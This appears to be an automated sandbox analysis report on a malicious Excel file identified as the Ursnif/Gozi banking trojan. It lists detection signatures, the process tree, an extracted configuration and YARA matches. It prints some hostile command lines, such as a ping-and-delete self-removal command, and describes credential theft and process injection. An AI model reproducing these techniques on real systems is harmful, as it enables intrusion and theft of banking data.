Play interactive tour

Edit tour

Analysis Report bonifico__8156.xls

Overview

General Information

Sample Name:	bonifico__8156.xls
MD5:	d3eeee7a0df0b673fdbd95910056a94c
SHA1:	4aeecf039e6c6c8e16be12735d0f616f6ebb28f1
SHA256:	c4583a46aa63ef15468b62d2c352e00ca3e6718aa2f8897c6093d67b5b42de20
Most interesting Screenshot:

Detection

Hidden Macro 4.0 Gozi Ursnif

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected Gozi e-Banking trojan
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Found malicious Excel 4.0 Macro
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Ursnif
Allocates memory in foreign processes
Changes memory attributes in foreign processes to executable or writable
Creates a COM Internet Explorer object
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found Tor onion address
Found abnormal large hidden Excel 4.0 Macro sheet
Hooks registry keys query functions (used to hide registry keys)
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the export address table of user mode modules (user mode EAT hooks)
Modifies the import address table of user mode modules (user mode IAT hooks)
Modifies the prolog of user mode functions (user mode inline hooks)
Office process drops PE file
Overwrites Mozilla Firefox settings
Tries to harvest and steal browser information (history, passwords, etc)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Writes or reads registry keys via WMI
Writes registry values via WMI
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to get notified if a device is plugged in / out
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains embedded VBA macros
Downloads executable code via HTTP
Drops PE files
Found evasive API chain (date check)
Found large amount of non-executed APIs
Internet Provider seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Yara detected Xls With Macro 4.0
Yara signature match

Classification

Startup

System is w10x64_office

EXCEL.EXE (PID: 6060 cmdline: 'C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE' /automation -Embedding MD5: D672D26C85AEB9536B9736BF04054969)

CVPFktt.exe (PID: 5940 cmdline: 'C:\sxibiNa\ZpsvnMb\CVPFktt.exe' MD5: 7494B31AF8F89F1051C7E9332FF7D331)

control.exe (PID: 4404 cmdline: C:\Windows\system32\control.exe /? MD5: 625DAC87CB5D7D44C5CA1DA57898065F)

explorer.exe (PID: 3760 cmdline: MD5: E4A81EDDFF8B844D85C8B45354E4144E)

cmd.exe (PID: 3840 cmdline: 'C:\Windows\System32\cmd.exe' /C ping localhost -n 5 && del 'C:\sxibiNa\ZpsvnMb\CVPFktt.exe' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 5264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

PING.EXE (PID: 5412 cmdline: ping localhost -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)

RuntimeBroker.exe (PID: 3208 cmdline: MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)

RuntimeBroker.exe (PID: 4328 cmdline: MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)

RuntimeBroker.exe (PID: 4964 cmdline: MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)

rundll32.exe (PID: 5864 cmdline: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL /? MD5: 73C519F050C20580F8A62C849D49215A)

iexplore.exe (PID: 2244 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 1272 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2244 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 1760 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 6052 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1760 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 5692 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 5568 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5692 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 1192 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 1084 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1192 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 1736 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 608 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1736 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

cleanup

Malware Configuration

Threatname: Ursnif

{"server": "12", "version": "214139", "uptime": "355", "crc": "2", "id": "7979", "user": "5f96128fead8a178b69d58d7d814c32c", "soft": "3"}

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
bonifico__8156.xls	JoeSecurity_XlsWithMacro4	Yara detected Xls With Macro 4.0	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000005.00000003.673957499.0000000001AF8000.00000004.00000040.sdmp	Ursnif	detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory	JPCERT/CC Incident Response Group	0xbdb:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$c1: version=%u 0xbe3:$c1: version=%u 0x816:$c2: user=%08x%08x%08x%08x 0xbee:$c2: user=%08x%08x%08x%08x 0x82c:$c3: server=%u 0xc04:$c3: server=%u 0x836:$c4: id=%u 0xc0e:$c4: id=%u 0x844:$c7: name=%s 0x80e:$c8: soft=%u 0xbdb:$c8: soft=%u
00000005.00000003.673957499.0000000001AF8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000005.00000003.853724525.00000000018FC000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000005.00000002.926087317.00000000009E1000.00000020.00000001.sdmp	Ursnif	detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory	JPCERT/CC Incident Response Group	0x38a9:$f1: 56 57 BE 80 C2 9E 00 8D 7D F4 A5 A5 A5 0x71ff:$f2: 35 8F E3 B7 3F 0x7223:$f3: 35 0A 60 2E 51
00000005.00000003.863551589.00000000001F0000.00000004.00000001.sdmp	Ursnif	detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory	JPCERT/CC Incident Response Group	0x70:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x78:$c1: version=%u 0xb0:$c1: version=%u 0x6ea:$c1: version=%u 0x83:$c2: user=%08x%08x%08x%08x 0xc3:$c2: user=%08x%08x%08x%08x 0x6f5:$c2: user=%08x%08x%08x%08x 0x99:$c3: server=%u 0xd9:$c3: server=%u 0x70b:$c3: server=%u 0xa3:$c4: id=%u 0xe3:$c4: id=%u 0x715:$c4: id=%u 0xf1:$c7: name=%s 0x723:$c7: name=%s 0x70:$c8: soft=%u 0xbb:$c8: soft=%u
00000005.00000003.863551589.00000000001F0000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000005.00000003.863551589.00000000001F0000.00000004.00000001.sdmp	GoziRule	Win32.Gozi	CCN-CERT	0x864:$: 63 00 6F 00 6F 00 6B 00 69 00 65 00 73 00 2E 00 73 00 71 00 6C 00 69 00 74 00 65 00 2D 00 6A 00 ...
00000005.00000003.674022899.0000000001AF8000.00000004.00000040.sdmp	Ursnif	detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory	JPCERT/CC Incident Response Group	0xbdb:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$c1: version=%u 0xbe3:$c1: version=%u 0x816:$c2: user=%08x%08x%08x%08x 0xbee:$c2: user=%08x%08x%08x%08x 0x82c:$c3: server=%u 0xc04:$c3: server=%u 0x836:$c4: id=%u 0xc0e:$c4: id=%u 0x844:$c7: name=%s 0x80e:$c8: soft=%u 0xbdb:$c8: soft=%u
00000005.00000003.674022899.0000000001AF8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000018.00000002.964247712.000002086E475000.00000004.00000001.sdmp	Ursnif	detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory	JPCERT/CC Incident Response Group	0x70:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x78:$c1: version=%u 0xb0:$c1: version=%u 0x701:$c1: version=%u 0x83:$c2: user=%08x%08x%08x%08x 0xc3:$c2: user=%08x%08x%08x%08x 0x70c:$c2: user=%08x%08x%08x%08x 0x99:$c3: server=%u 0xd9:$c3: server=%u 0x722:$c3: server=%u 0xa3:$c4: id=%u 0xe3:$c4: id=%u 0x72c:$c4: id=%u 0xf1:$c7: name=%s 0x73a:$c7: name=%s 0x70:$c8: soft=%u 0xbb:$c8: soft=%u
00000018.00000002.964247712.000002086E475000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000005.00000003.673619399.0000000001AF8000.00000004.00000040.sdmp	Ursnif	detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory	JPCERT/CC Incident Response Group	0xbdb:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$c1: version=%u 0xbe3:$c1: version=%u 0x816:$c2: user=%08x%08x%08x%08x 0xbee:$c2: user=%08x%08x%08x%08x 0x82c:$c3: server=%u 0xc04:$c3: server=%u 0x836:$c4: id=%u 0xc0e:$c4: id=%u 0x844:$c7: name=%s 0x80e:$c8: soft=%u 0xbdb:$c8: soft=%u
00000005.00000003.673619399.0000000001AF8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000013.00000002.927921133.00000000003F5000.00000004.00000001.sdmp	Ursnif	detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory	JPCERT/CC Incident Response Group	0x70:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x78:$c1: version=%u 0xb0:$c1: version=%u 0x701:$c1: version=%u 0x83:$c2: user=%08x%08x%08x%08x 0xc3:$c2: user=%08x%08x%08x%08x 0x70c:$c2: user=%08x%08x%08x%08x 0x99:$c3: server=%u 0xd9:$c3: server=%u 0x722:$c3: server=%u 0xa3:$c4: id=%u 0xe3:$c4: id=%u 0x72c:$c4: id=%u 0xf1:$c7: name=%s 0x73a:$c7: name=%s 0x70:$c8: soft=%u 0xbb:$c8: soft=%u
00000013.00000002.927921133.00000000003F5000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000005.00000003.673893180.0000000001AF8000.00000004.00000040.sdmp	Ursnif	detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory	JPCERT/CC Incident Response Group	0xbdb:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$c1: version=%u 0xbe3:$c1: version=%u 0x816:$c2: user=%08x%08x%08x%08x 0xbee:$c2: user=%08x%08x%08x%08x 0x82c:$c3: server=%u 0xc04:$c3: server=%u 0x836:$c4: id=%u 0xc0e:$c4: id=%u 0x844:$c7: name=%s 0x80e:$c8: soft=%u 0xbdb:$c8: soft=%u
00000005.00000003.673893180.0000000001AF8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000005.00000002.928248416.0000000001AF8000.00000004.00000040.sdmp	Ursnif	detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory	JPCERT/CC Incident Response Group	0xbdb:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$c1: version=%u 0xbe3:$c1: version=%u 0x816:$c2: user=%08x%08x%08x%08x 0xbee:$c2: user=%08x%08x%08x%08x 0x82c:$c3: server=%u 0xc04:$c3: server=%u 0x836:$c4: id=%u 0xc0e:$c4: id=%u 0x844:$c7: name=%s 0x80e:$c8: soft=%u 0xbdb:$c8: soft=%u
0000001B.00000002.961472793.000001D62C085000.00000004.00000001.sdmp	Ursnif	detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory	JPCERT/CC Incident Response Group	0x70:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x78:$c1: version=%u 0xb0:$c1: version=%u 0x701:$c1: version=%u 0x83:$c2: user=%08x%08x%08x%08x 0xc3:$c2: user=%08x%08x%08x%08x 0x70c:$c2: user=%08x%08x%08x%08x 0x99:$c3: server=%u 0xd9:$c3: server=%u 0x722:$c3: server=%u 0xa3:$c4: id=%u 0xe3:$c4: id=%u 0x72c:$c4: id=%u 0xf1:$c7: name=%s 0x73a:$c7: name=%s 0x70:$c8: soft=%u 0xbb:$c8: soft=%u
0000001B.00000002.961472793.000001D62C085000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000014.00000002.983042275.0000000005395000.00000004.00000001.sdmp	Ursnif	detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory	JPCERT/CC Incident Response Group	0x70:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x78:$c1: version=%u 0xb0:$c1: version=%u 0x701:$c1: version=%u 0x83:$c2: user=%08x%08x%08x%08x 0xc3:$c2: user=%08x%08x%08x%08x 0x70c:$c2: user=%08x%08x%08x%08x 0x99:$c3: server=%u 0xd9:$c3: server=%u 0x722:$c3: server=%u 0xa3:$c4: id=%u 0xe3:$c4: id=%u 0x72c:$c4: id=%u 0xf1:$c7: name=%s 0x73a:$c7: name=%s 0x70:$c8: soft=%u 0xbb:$c8: soft=%u
00000014.00000002.983042275.0000000005395000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000005.00000003.840741747.0000000001AF8000.00000004.00000040.sdmp	Ursnif	detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory	JPCERT/CC Incident Response Group	0xbdb:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$c1: version=%u 0xbe3:$c1: version=%u 0x816:$c2: user=%08x%08x%08x%08x 0xbee:$c2: user=%08x%08x%08x%08x 0x82c:$c3: server=%u 0xc04:$c3: server=%u 0x836:$c4: id=%u 0xc0e:$c4: id=%u 0x844:$c7: name=%s 0x80e:$c8: soft=%u 0xbdb:$c8: soft=%u
00000019.00000002.928724450.0000020620EA5000.00000004.00000001.sdmp	Ursnif	detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory	JPCERT/CC Incident Response Group	0x70:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x78:$c1: version=%u 0xb0:$c1: version=%u 0x701:$c1: version=%u 0x83:$c2: user=%08x%08x%08x%08x 0xc3:$c2: user=%08x%08x%08x%08x 0x70c:$c2: user=%08x%08x%08x%08x 0x99:$c3: server=%u 0xd9:$c3: server=%u 0x722:$c3: server=%u 0xa3:$c4: id=%u 0xe3:$c4: id=%u 0x72c:$c4: id=%u 0xf1:$c7: name=%s 0x73a:$c7: name=%s 0x70:$c8: soft=%u 0xbb:$c8: soft=%u
00000019.00000002.928724450.0000020620EA5000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000005.00000003.673792212.0000000001AF8000.00000004.00000040.sdmp	Ursnif	detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory	JPCERT/CC Incident Response Group	0xbdb:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$c1: version=%u 0xbe3:$c1: version=%u 0x816:$c2: user=%08x%08x%08x%08x 0xbee:$c2: user=%08x%08x%08x%08x 0x82c:$c3: server=%u 0xc04:$c3: server=%u 0x836:$c4: id=%u 0xc0e:$c4: id=%u 0x844:$c7: name=%s 0x80e:$c8: soft=%u 0xbdb:$c8: soft=%u
00000005.00000003.673792212.0000000001AF8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000013.00000003.874633274.000001E6C3640000.00000004.00000001.sdmp	Ursnif	detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory	JPCERT/CC Incident Response Group	0x70:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x78:$c1: version=%u 0xb0:$c1: version=%u 0x701:$c1: version=%u 0x83:$c2: user=%08x%08x%08x%08x 0xc3:$c2: user=%08x%08x%08x%08x 0x70c:$c2: user=%08x%08x%08x%08x 0x99:$c3: server=%u 0xd9:$c3: server=%u 0x722:$c3: server=%u 0xa3:$c4: id=%u 0xe3:$c4: id=%u 0x72c:$c4: id=%u 0xf1:$c7: name=%s 0x73a:$c7: name=%s 0x70:$c8: soft=%u 0xbb:$c8: soft=%u
00000013.00000003.874633274.000001E6C3640000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp	Ursnif	detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory	JPCERT/CC Incident Response Group	0x27070:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x27078:$c1: version=%u 0x270b0:$c1: version=%u 0x276ea:$c1: version=%u 0x27083:$c2: user=%08x%08x%08x%08x 0x270c3:$c2: user=%08x%08x%08x%08x 0x276f5:$c2: user=%08x%08x%08x%08x 0x27099:$c3: server=%u 0x270d9:$c3: server=%u 0x2770b:$c3: server=%u 0x270a3:$c4: id=%u 0x270e3:$c4: id=%u 0x27715:$c4: id=%u 0x270f1:$c7: name=%s 0x27723:$c7: name=%s 0x27070:$c8: soft=%u 0x270bb:$c8: soft=%u 0x133b0:$f1: 56 57 BE 4C 25 1E 00 8D 7D F4 A5 A5 A5 0x17891:$f2: 35 8F E3 B7 3F
00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp	GoziRule	Win32.Gozi	CCN-CERT	0x27864:$: 63 00 6F 00 6F 00 6B 00 69 00 65 00 73 00 2E 00 73 00 71 00 6C 00 69 00 74 00 65 00 2D 00 6A 00 ...
0000001A.00000002.961758801.000001456D585000.00000004.00000001.sdmp	Ursnif	detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory	JPCERT/CC Incident Response Group	0x70:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x78:$c1: version=%u 0xb0:$c1: version=%u 0x701:$c1: version=%u 0x83:$c2: user=%08x%08x%08x%08x 0xc3:$c2: user=%08x%08x%08x%08x 0x70c:$c2: user=%08x%08x%08x%08x 0x99:$c3: server=%u 0xd9:$c3: server=%u 0x722:$c3: server=%u 0xa3:$c4: id=%u 0xe3:$c4: id=%u 0x72c:$c4: id=%u 0xf1:$c7: name=%s 0x73a:$c7: name=%s 0x70:$c8: soft=%u 0xbb:$c8: soft=%u
0000001A.00000002.961758801.000001456D585000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000005.00000003.673489537.0000000001AF8000.00000004.00000040.sdmp	Ursnif	detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory	JPCERT/CC Incident Response Group	0xbdb:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$c1: version=%u 0xbe3:$c1: version=%u 0x816:$c2: user=%08x%08x%08x%08x 0xbee:$c2: user=%08x%08x%08x%08x 0x82c:$c3: server=%u 0xc04:$c3: server=%u 0x836:$c4: id=%u 0xc0e:$c4: id=%u 0x844:$c7: name=%s 0x80e:$c8: soft=%u 0xbdb:$c8: soft=%u
00000005.00000003.673489537.0000000001AF8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000019.00000003.927231597.0000020620F10000.00000004.00000001.sdmp	Ursnif	detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory	JPCERT/CC Incident Response Group	0x70:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x78:$c1: version=%u 0xb0:$c1: version=%u 0x701:$c1: version=%u 0x83:$c2: user=%08x%08x%08x%08x 0xc3:$c2: user=%08x%08x%08x%08x 0x70c:$c2: user=%08x%08x%08x%08x 0x99:$c3: server=%u 0xd9:$c3: server=%u 0x722:$c3: server=%u 0xa3:$c4: id=%u 0xe3:$c4: id=%u 0x72c:$c4: id=%u 0xf1:$c7: name=%s 0x73a:$c7: name=%s 0x70:$c8: soft=%u 0xbb:$c8: soft=%u
00000019.00000003.927231597.0000020620F10000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000005.00000003.673993514.0000000001AF8000.00000004.00000040.sdmp	Ursnif	detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory	JPCERT/CC Incident Response Group	0xbdb:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$c1: version=%u 0xbe3:$c1: version=%u 0x816:$c2: user=%08x%08x%08x%08x 0xbee:$c2: user=%08x%08x%08x%08x 0x82c:$c3: server=%u 0xc04:$c3: server=%u 0x836:$c4: id=%u 0xc0e:$c4: id=%u 0x844:$c7: name=%s 0x80e:$c8: soft=%u 0xbdb:$c8: soft=%u
00000005.00000003.673993514.0000000001AF8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000005.00000003.853379113.0000000001AF8000.00000004.00000040.sdmp	Ursnif	detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory	JPCERT/CC Incident Response Group	0xbdb:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$c1: version=%u 0xbe3:$c1: version=%u 0x816:$c2: user=%08x%08x%08x%08x 0xbee:$c2: user=%08x%08x%08x%08x 0x82c:$c3: server=%u 0xc04:$c3: server=%u 0x836:$c4: id=%u 0xc0e:$c4: id=%u 0x844:$c7: name=%s 0x80e:$c8: soft=%u 0xbdb:$c8: soft=%u
00000005.00000003.673725897.0000000001AF8000.00000004.00000040.sdmp	Ursnif	detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory	JPCERT/CC Incident Response Group	0xbdb:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$c1: version=%u 0xbe3:$c1: version=%u 0x816:$c2: user=%08x%08x%08x%08x 0xbee:$c2: user=%08x%08x%08x%08x 0x82c:$c3: server=%u 0xc04:$c3: server=%u 0x836:$c4: id=%u 0xc0e:$c4: id=%u 0x844:$c7: name=%s 0x80e:$c8: soft=%u 0xbdb:$c8: soft=%u
00000005.00000003.673725897.0000000001AF8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000005.00000003.922958864.0000000001AF8000.00000004.00000040.sdmp	Ursnif	detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory	JPCERT/CC Incident Response Group	0xbdb:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$c1: version=%u 0xbe3:$c1: version=%u 0x816:$c2: user=%08x%08x%08x%08x 0xbee:$c2: user=%08x%08x%08x%08x 0x82c:$c3: server=%u 0xc04:$c3: server=%u 0x836:$c4: id=%u 0xc0e:$c4: id=%u 0x844:$c7: name=%s 0x80e:$c8: soft=%u 0xbdb:$c8: soft=%u
Process Memory Space: explorer.exe PID: 3760	Ursnif	detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory	JPCERT/CC Incident Response Group	0x43859a:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x43a2a9:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x4385a2:$c1: version=%u 0x4385e6:$c1: version=%u 0x438ed6:$c1: version=%u 0x43a2b1:$c1: version=%u 0x43a2e8:$c1: version=%u 0x43a8c9:$c1: version=%u 0x4385ad:$c2: user=%08x%08x%08x%08x 0x4385f9:$c2: user=%08x%08x%08x%08x 0x438ee1:$c2: user=%08x%08x%08x%08x 0x43a2bc:$c2: user=%08x%08x%08x%08x 0x43a2fb:$c2: user=%08x%08x%08x%08x 0x43a8d4:$c2: user=%08x%08x%08x%08x 0x4385c3:$c3: server=%u 0x43860f:$c3: server=%u 0x438ef7:$c3: server=%u 0x43a2d2:$c3: server=%u 0x43a311:$c3: server=%u 0x43a8ea:$c3: server=%u 0x4385cd:$c4: id=%u
Process Memory Space: explorer.exe PID: 3760	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: RuntimeBroker.exe PID: 3208	Ursnif	detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory	JPCERT/CC Incident Response Group	0x5b5f8:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x5d5c2:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x5b600:$c1: version=%u 0x5b647:$c1: version=%u 0x5c003:$c1: version=%u 0x5d5ca:$c1: version=%u 0x5d601:$c1: version=%u 0x5dbe2:$c1: version=%u 0x5b60b:$c2: user=%08x%08x%08x%08x 0x5b65a:$c2: user=%08x%08x%08x%08x 0x5c00e:$c2: user=%08x%08x%08x%08x 0x5d5d5:$c2: user=%08x%08x%08x%08x 0x5d614:$c2: user=%08x%08x%08x%08x 0x5dbed:$c2: user=%08x%08x%08x%08x 0x5b621:$c3: server=%u 0x5b670:$c3: server=%u 0x5c024:$c3: server=%u 0x5d5eb:$c3: server=%u 0x5d62a:$c3: server=%u 0x5dc03:$c3: server=%u 0x5b62b:$c4: id=%u
Process Memory Space: RuntimeBroker.exe PID: 3208	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Click to see the 43 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: CVPFktt.exe.5940.5.memstr

Malware Configuration Extractor: Ursnif {"server": "12", "version": "214139", "uptime": "355", "crc": "2", "id": "7979", "user": "5f96128fead8a178b69d58d7d814c32c", "soft": "3"}

Multi AV Scanner detection for submitted file

Show sources

Source: bonifico__8156.xls

Virustotal: Detection: 21%

Perma Link

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\N71PG28V\0n1ine[1].exe	Joe Sandbox ML: detected
Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	Joe Sandbox ML: detected

Source: 5.2.CVPFktt.exe.400000.0.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Source: C:\Windows\explorer.exe

Code function: 20_2_05371E5C RegisterDeviceNotificationA,

20_2_05371E5C

Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	Code function: 5_2_001C8069 lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,	5_2_001C8069
Source: C:\sxibiNa\ZpsvnMb\CVPFktt.exe	Code function: 5_2_001DB8FF RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,LdrInitializeThunk,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,	5_2_001DB8FF
